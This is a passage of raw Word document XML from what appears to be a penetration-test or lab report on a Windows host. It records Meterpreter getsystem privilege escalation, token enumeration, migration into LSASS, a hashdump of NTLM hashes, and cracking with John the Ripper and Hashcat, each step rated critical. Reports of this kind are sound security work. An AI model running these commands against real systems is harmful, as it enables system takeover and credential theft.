        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3  Escalation Attempt 1 — Failed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The first getsystem attempt was unsuccessful; all escalation methods were blocked:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9360"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:right w:val="single" w:color="1A7A5E"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meterpreter &gt; getsystem</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Named Pipe Impersonation (In Memory/Admin) ... FAILED</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Named Pipe Impersonation (Dropper/Admin) ... FAILED</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Token Duplication (In Memory/Admin) ... FAILED</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Named Pipe Impersonation (RPCSS variant) ... FAILED</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Named Pipe Impersonation (PrintSpooler) ... FAILED</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Named Pipe Impersonation (EFSRPC/EfsPotato) ... FAILED</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4  Token Enumeration via Incognito</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Incognito extension was loaded to enumerate delegation tokens residing in memory. An NT AUTHORITY\SYSTEM token was identified:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9360"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:right w:val="single" w:color="1A7A5E"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meterpreter &gt; load incognito</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Loading extension incognito... Success.</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meterpreter &gt; list_tokens -u</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Delegation Tokens Available:</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DESKTOP-AR0UM8P\root</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NT AUTHORITY\SYSTEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5  Escalation Attempt 2 — Successful</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A fresh session was launched with the elevated context. The getsystem command succeeded via Named Pipe Impersonation (In Memory/Admin), yielding NT AUTHORITY\SYSTEM:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9360"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:right w:val="single" w:color="1A7A5E"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meterpreter &gt; getsystem</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...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).</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meterpreter &gt; shell</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C:\Windows\system32&gt; ipconfig</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IPv4 Address: 192.168.40.140</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1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="8B0000" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠  SEVERITY: CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D0EDE4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D3B2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Privilege escalation to NT AUTHORITY\SYSTEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D0EDE4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D3B2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Named Pipe Impersonation (In Memory/Admin)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D0EDE4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D3B2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Resulting Privilege</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">NT AUTHORITY\SYSTEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D0EDE4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D3B2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Active Session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Session 2 — x64/windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D0EDE4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D3B2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-269: Improper Privilege Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D3B2E"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Phase 3 — Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1  Credential Harvesting via LSASS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">With SYSTEM-level privileges, the attacker located the LSASS process — responsible for holding Windows credential hashes in memory — and migrated the Meterpreter agent into it to extract those hashes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9360"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:right w:val="single" w:color="1A7A5E"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meterpreter &gt; ps -S lsass.exe</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PID   Name       Arch  Session  User                  Path</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652   lsass.exe  x64   0        NT AUTHORITY\SYSTEM   C:\Windows\System32\lsass.exe</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meterpreter &gt; migrate 652</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Migration completed successfully.</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meterpreter &gt; hashdump</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Administrator:500:aad3b435...:31d6cfe0d16ae931b73c59d7e0c089c0:::</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DefaultAccount:503:aad3b435...:31d6cfe0d16ae931b73c59d7e0c089c0:::</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Guest:501:aad3b435...:31d6cfe0d16ae931b73c59d7e0c089c0:::</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:1000:aad3b435...:31d6cfe0d16ae931b73c59d7e0c089c0:::</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WDAGUtilityAccount:504:aad3b435...:371ba99112690010acd8724efcfe9083:::</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2  Offline Hash Cracking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The recovered NTLM hashes were subjected to offline dictionary-based attacks using both John the Ripper and Hashcat with common wordlists:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9360"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
          <w:right w:val="single" w:color="1A7A5E"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John the Ripper — rockyou.txt</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john --format=NT hashdump.txt --wordlist=/usr/share/wordlists/rockyou.txt.gz</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(Administrator) — cracked</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Hashcat — xato-net-10-million-passwords</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hashcat -m 1000 hashdump.txt xato-net-10-million-passwords-1000000.txt</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Status: Exhausted | Recovered: 1/3 (33.33%)</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1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="8B0000" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠  SEVERITY: CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D0EDE4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D3B2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">NTLM credential hashes extracted from LSASS process memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D0EDE4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D3B2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Meterpreter process migration into LSASS (PID 652) + hashdump</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D0EDE4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D3B2E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Accounts Affected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>
            <w:tcBorders>
